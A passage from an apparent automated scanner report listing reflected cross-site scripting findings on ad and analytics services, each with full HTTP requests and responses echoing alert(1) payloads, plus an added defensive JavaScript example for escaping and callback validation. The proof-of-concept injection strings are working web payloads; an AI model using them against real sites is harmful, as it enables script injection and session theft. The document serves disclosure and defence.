Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1299589746302-New%7C1362661746302%3B%20s_nrgvo%3DNew%7C1362661746303%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: gcp.dirty=true; Expires=Tue, 22-Mar-2011 22:11:27 GMT; Path=/
Content-Type: application/json;charset=UTF-8
Date: Tue, 22 Mar 2011 22:06:26 GMT
Content-Length: 161

jsonp13008314972494950b<script>alert(1)</script>2c4c70b388a({
"status" : "OK",
"shares" : {
"twitter" : "1",
"print" : "5"
},
"comments" : -1
});

1.195. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied, unmodified, into a string inside the AMF-serialized response. The payload fd23b<script>alert(1)</script>050d3c5e27a was submitted in that parameter.

This shows the value is reflected without encoding. The response is application/x-amf, a binary Flash remoting format consumed by the player rather than an HTML document, so the echoed <script> tag is only data to the AMF deserializer; script execution in a browser is not demonstrated here.

Request

POST /services/messagebroker/amf?playerId=65879909001 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=271&flashID=myExperience57142042001&bgcolor=%23FFFFFF&wmode=transparent&playerID=65879909001&publisherID=1214017254&isVid=true&linkBaseURL=http%3A%2F%2Fwww.sailingworld.com%2Fbrightcove_playlists%2Fvideo%2F814312930001&%40videoPlayer=814312930001&autoStart=&debuggerID=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 482

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q2e0453ef68f902b62b792fae0d9251f80aa44507
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:00:55 GMT
Server:
Content-Length: 4214

......../1/onResult.....].
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAEhcbuY~,I8GEKf3z53IAPdrqMKxcfiS4n2k7cdBc.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bg...Z ..ivideoPlayerfd23b<script>alert(1)</script>050d3c5e27a..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

1.196. http://cim.meebo.com/cmd/drads [impression parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cmd/drads

Issue detail

The value of the impression request parameter is copied into a JSON string value in the response body. The payload a94be<script>alert(1)</script>39527c40ac9acc679 was submitted in the impression parameter and was echoed unmodified.

This shows the value is reflected without encoding. The response is served as application/json, so the echoed tag is data to a JSON parser; whether it ever executes depends on the consumer of this data writing it into the DOM without encoding, or on a browser sniffing the body as HTML, neither of which this report tests.

The original request used the POST method; it could be converted to a GET request (shown below), which makes the attack easier to demonstrate and deliver.

Request

GET /cmd/drads?mindset=AH%3D1%26AK%3D1%26AN%3D1%26AP%3D5%26AQ%3D1&referrer=&partner=tmz&tcookie=267e663c46bf3f71bb6e&impression_num=1&session_time=1&active=0&secure=false&clientVersion=10_3_13&type=DRMediaAlert&impression=http%3A%2F%2Fad.doubleclick.net%2Fimp%3Bv7%3Bx%3B234545403%3B0-0%3B0%3B48682791%3B24%2F24%3B34832749%2F34850604%2F1%3B%3B~aopt%3D2%2F0%2Fff%2F0%3B~okv%3D%3Bsecure%3Dfalse%3Bposition%3D1%3BAA%3D1%3BAB%3D5%3BAD%3D1%3BAF%3D1%3BAH%3D5%3BAI%3D5%3BAJ%3D1%3BAK%3D1%3BAL%3D5%3BAM%3D5%3BAN%3D5%3BAQ%3D1%3BAR%3D5%3BAS%3D5%3BAT%3D1%3BAU%3D1%3Bic17%3D1%3Bic22%3D1%3Bic16%3D1%3Bic12%3D1%3Bic24%3D1%3Bic10%3D1%3Bac17%3D1%3Bac14%3D1%3Bac10%3D1%3Bpc2%3D1%3Bpc1%3D1%3Bac2%3D1%3Bic3%3D1%3Bic2%3D1%3Bic6%3D1%3Bic5%3D1%3Bic19%3D1%3Bac16%3D1%3Bac12%3D1%3Bpc4%3D1%3Bic9%3D1%3Bac5%3D1%3Bic1%3D1%3Bac8%3D1%3Bsz%3D24x24%3Bdcmt%3Dtext%2Fhtml%3B~cs%3Do%253fhttp%3A%2F%2Fs0.2mdn.net%2Fdot.gif%3F7583680a94be<script>alert(1)</script>39527c40ac9acc679&click=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3ad2%2F3%2F0%2F%252a%2Fe%253B234545403%253B0-0%253B0%253B48682791%253B3634-24%2F24%253B34832749%2F34850604%2F1%253B%253B%257Eaopt%253D2%2F0%2Fff%2F0%253B%257Esscs%253D%253fhttp%3A%2F%2Fwww.meebo.com%2Fblank.html&operating_system=Windows&user_agent=Chrome%2010 HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_13&protocol=http%3A&network=tmz
Cache-Control: max-age=0
Origin: http://cim.meebo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=15a6c83c109b781d8bb4; meebo-cim-session=2ed7452f31bb7e416cec; tcookie=267e663c46bf3f71bb6e%26true%26AA%3D1%26AB%3D5%26AD%3D1%26AF%3D1%26AH%3D5%26AI%3D5%26AJ%3D1%26AK%3D1%26AL%3D5%26AM%3D5%26AN%3D5%26AQ%3D1%26AR%3D5%26AS%3D5%26AT%3D1%26AU%3D1%26ic17%3D1%26ic22%3D1%26ic16%3D1%26ic12%3D1%26ic24%3D1%26ic10%3D1%26ac17%3D1%26ac14%3D1%26ac10%3D1%26pc2%3D1%26pc1%3D1%26ac2%3D1%26ic3%3D1%26ic2%3D1%26ic6%3D1%26ic5%3D1%26ic19%3D1%26ac16%3D1%26ac12%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic1%3D1%26ac8%3D1%26AP%3D5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 22 Mar 2011 22:03:54 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 680

{"stat": "ok", "data": {"advertisement": {"impression": ["http://ad.doubleclick.net/imp;v7;x;234545403;0-0;0;48682791;24/24;34832749/34850604/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;AA=1;AB=5;
...[SNIP]...
ic12=1;ic24=1;ic10=1;ac17=1;ac14=1;ac10=1;pc2=1;pc1=1;ac2=1;ic3=1;ic2=1;ic6=1;ic5=1;ic19=1;ac16=1;ac12=1;pc4=1;ic9=1;ac5=1;ic1=1;ac8=1;sz=24x24;dcmt=text/html;~cs=o%3fhttp://s0.2mdn.net/dot.gif?7583680a94be<script>alert(1)</script>39527c40ac9acc679", "http://r2d2.meebo.com/e.gif?component=DRMediaAlert&tm=35025668&adId=house&shareId=house&partner=tmz&type=impression"], "type": "house"}}}

1.197. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the esi request parameter is copied, as part of the raw query string, into a JavaScript string literal delimited by single quotation marks (InsightExpress.QueryString='...'). The payload 88954'-alert(1)-'c9f483b2c61 was submitted in the esi parameter and was echoed unmodified: the ' in the payload terminates the literal, so -alert(1)- is parsed as code.

This proof-of-concept demonstrates JavaScript injection. Unlike a <script> tag reflected into JSON, this needs no content sniffing: the response is text/javascript and is loaded with a <script src> include by ad slots such as the ads.cnn.com referrer shown, so the injected code runs with the privileges of whichever page includes the script with that query string.

Request

GET /adServer/GetInvite2.aspx?esi=true88954'-alert(1)-'c9f483b2c61&bannerID=173670&referer=ads.cnn.com HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:03 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22006

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true88954'-alert(1)-'c9f483b2c61&bannerID=173670&referer=ads.cnn.com'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300",
...[SNIP]...

1.198. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied, as part of the raw query string, into a JavaScript string literal delimited by single quotation marks (InsightExpress.QueryString='...'). The payload 2b92e'-alert(1)-'dabbc06a026 was submitted as a parameter name and was echoed unmodified: the ' in the payload terminates the literal, so -alert(1)- is parsed as code. Because the whole query string is embedded, no particular parameter is needed; any added name or value containing ' breaks out.

This proof-of-concept demonstrates JavaScript injection. The response is text/javascript and is loaded with a <script src> include by ad slots such as the ads.cnn.com referrer shown, so the injected code runs with the privileges of whichever page includes the script with that query string.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173670&referer=ads.cnn.com&2b92e'-alert(1)-'dabbc06a026=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:14 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22019

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ss.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=173670&referer=ads.cnn.com&2b92e'-alert(1)-'dabbc06a026=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300","Height":"250","ReuseWindow":false
...[SNIP]...
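
The findings above fall into three shapes of the same mistake, untrusted text written into script without serialization: a JSONP callback name echoed unchecked (1.184, 1.186, 1.194), parameter values dropped between double quotes in an object literal (1.187 to 1.193), and the raw query string dropped between single quotes (1.197 to 1.199). The block below is an added example, not code from the XSS.CX report or from bizographics, AOL, comScore or InsightExpress; it uses one serializer for all three shapes, a strict callback check, and a small harness that runs the generated script with a counting alert stub so the break-out in the 1.197 shape is observable without a browser. Function names, the field list and the callback length cap are assumptions.

```javascript
// Added example for findings 1.184/1.186/1.194 (JSONP callbacks),
// 1.187-1.193 (values inside a JS object literal) and 1.197-1.199 (raw query
// string inside a single-quoted JS string). Not code from the XSS.CX report
// or from any service it names; function and field names are assumptions.

// 1. Serializer for untrusted data written into script. JSON.stringify
//    already escapes quotes, backslashes and control characters; the extra
//    replacements cover what it leaves alone: U+2028/U+2029 (line
//    terminators in older JS engines) and angle brackets, so the output can
//    never form "</script>" or a tag even if pasted inline into HTML.
function jsLiteral(value) {
  return JSON.stringify(value)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029')
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
}

// 2. The 1.197-1.199 shape: the raw query string pasted between single
//    quotes. A "'" in the value ends the literal and the remainder is code.
function renderQueryStringUnsafe(queryString) {
  return "var QueryString='" + queryString + "';return QueryString;";
}
// Same output shape, but the value is serialized rather than concatenated.
function renderQueryStringSafe(queryString) {
  return 'var QueryString=' + jsLiteral(String(queryString)) + ';return QueryString;';
}

// 3. The 1.187-1.193 shape: per-field values inside COMSCORE.beacon({...}).
//    Serializing the whole argument in one call means a '"' or '\' in any
//    field stays inside that field's string instead of ending it.
const BEACON_FIELDS = ['c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c10', 'c15', 'c16', 'r'];
function renderBeaconArg(params) {
  const obj = {};
  for (const k of BEACON_FIELDS) obj[k] = params[k] === undefined ? '' : String(params[k]);
  return jsLiteral(obj); // e.g. {"c1":"7","c2":"5964888",...}
}

// 4. JSONP: the callback must be an identifier (optionally dotted) before it
//    is written anywhere; a rejected name is never echoed. The length cap is
//    an assumed hardening, not something the report specifies.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const CALLBACK_MAX_LEN = 64;
function isValidCallback(name) {
  return typeof name === 'string' && name.length <= CALLBACK_MAX_LEN && CALLBACK_RE.test(name);
}
// Returns {status, headers, body} so it can be exercised without a server.
function renderJsonp(callback, payload) {
  const headers = { 'X-Content-Type-Options': 'nosniff' };
  if (callback === undefined) {
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 200, headers, body: jsLiteral(payload) };
  }
  if (!isValidCallback(callback)) {
    // Generic error; the offending name appears nowhere in the response.
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 400, headers, body: jsLiteral({ error: 'invalid callback' }) };
  }
  headers['Content-Type'] = 'application/javascript; charset=utf-8';
  // The leading comment is a common hardening so the body never begins with
  // caller-chosen bytes.
  return { status: 200, headers, body: '/**/' + callback + '(' + jsLiteral(payload) + ');' };
}

// 5. Harness: run generated script with a stub alert that counts calls, so
//    the difference between unsafe and safe rendering is observable offline.
function execute(code) {
  let alerts = 0;
  const result = new Function('alert', code)(() => { alerts += 1; });
  return { result, alerts };
}

// Constructed sample in the shape of the 1.197 payload. Unsafe rendering
// calls alert once; safe rendering returns the original string untouched.
function demo() {
  const qs = "esi=true88954'-alert(1)-'c9f483b2c61&bannerID=173670";
  return {
    unsafe: execute(renderQueryStringUnsafe(qs)),
    safe: execute(renderQueryStringSafe(qs)),
  };
}
```

Running demo() executes the unsafe rendering of the 1.197 payload once through the alert stub and returns the original string from the safe rendering. The serializer deliberately escapes < and > as \u003c and \u003e: inside an external script this is redundant, but it costs nothing and keeps the same function safe if the output is ever written into an inline <script> block, where a literal </script> would end the element.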

1.199. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied, as part of the raw query string, into a JavaScript string literal delimited by single quotation marks (InsightExpress.QueryString='...'). The payload c74dd'-alert(1)-'f0d13a569ac was submitted in the referer parameter and was echoed unmodified: the ' in the payload terminates the literal, so -alert(1)- is parsed as code.

This proof-of-concept demonstrates JavaScript injection. The response is text/javascript and is loaded with a <script src> include by ad slots such as the ads.cnn.com referrer shown, so the injected code runs with the privileges of whichever page includes the script with that query string.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173670&referer=ads.cnn.comc74dd'-alert(1)-'f0d13a569ac HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22034

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ess.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=173670&referer=ads.cnn.comc74dd'-alert(1)-'f0d13a569ac'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300","Height":"250","ReuseWindow":false,"
...[SNIP]...

1.200. http://ds.addthis.com/red/psi/sites/www.sailingworld.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.sailingworld.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1e865<script>alert(1)</script>cdcc126bc09 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.sailingworld.com/p.json?callback=_ate.ad.hpr1e865<script>alert(1)</script>cdcc126bc09&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.sailingworld.com%2Fcontests%2Fannouncing-i-sw-i-s-dr-crash-photo-contest&ref=http%3A%2F%2Fwww.sailingworld.com%2F&r2xkc1 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh35.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642103.60|1300642103.1FE|1300446510.66|1299801259.19A; dt=X; psc=4; uid=4d5af32c71c2e1a5; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 398
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 22 Mar 2011 22:01:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 21 Apr 2011 22:01:42 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300831302.1FE|1300831302.60|1299801259.19A|1300446510.66; Domain=.addthis.com; Expires=Thu, 21-Mar-2013 22:01:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 22 Mar 2011 22:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:01:42 GMT
Connection: close

_ate.ad.hpr1e865<script>alert(1)</script>cdcc126bc09({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d5af32c71c2e1a5","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.sailing
...[SNIP]...

1.201. http://g2.gumgum.com/services/get [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6045<script>alert(1)</script>f2acd6c343b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/get?callback=GGGV.startServicesd6045<script>alert(1)</script>f2acd6c343b&_=1300831467972&pubdata=%7B%22t%22%3A%22tmzdtcom%22%2C%22v%22%3A1%2C%22r%22%3A%227855%22%2C%22rf%22%3A%22%22%7D HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 22 Mar 2011 22:05:51 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Set-Cookie: loc=nwprqBiWooZ4P3XLkY2HWKP2ljIYMkPGdV51afXZciI; Domain=.gumgum.com; Expires=Thu, 21-Apr-2011 22:05:51 GMT; Path=/
Set-Cookie: vst=3dfcb163-b82b-4f71-bb2b-f3c9a54ac8e8; Domain=.gumgum.com; Expires=Thu, 21-Apr-2011 22:05:51 GMT; Path=/
Connection: keep-alive
Content-Length: 327

GGGV.startServicesd6045<script>alert(1)</script>f2acd6c343b({"at":{"mh":200,"sf":true,"jit":true,"mw":200,"inline":true,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantca
...[SNIP]...

1.202. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.microsoft.com
Path:   /en-us/homepage/bimapping.js

Issue detail

The value of the v request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e777%3balert(1)//ed6a1ff59af was submitted in the v parameter. This input was echoed as 6e777;alert(1)//ed6a1ff59af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/homepage/bimapping.js?v=BiMapping6e777%3balert(1)//ed6a1ff59af&k=/en-us/homepage/Components/BiMapping.xml&ver=1.0.0 HTTP/1.1
Host: i.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
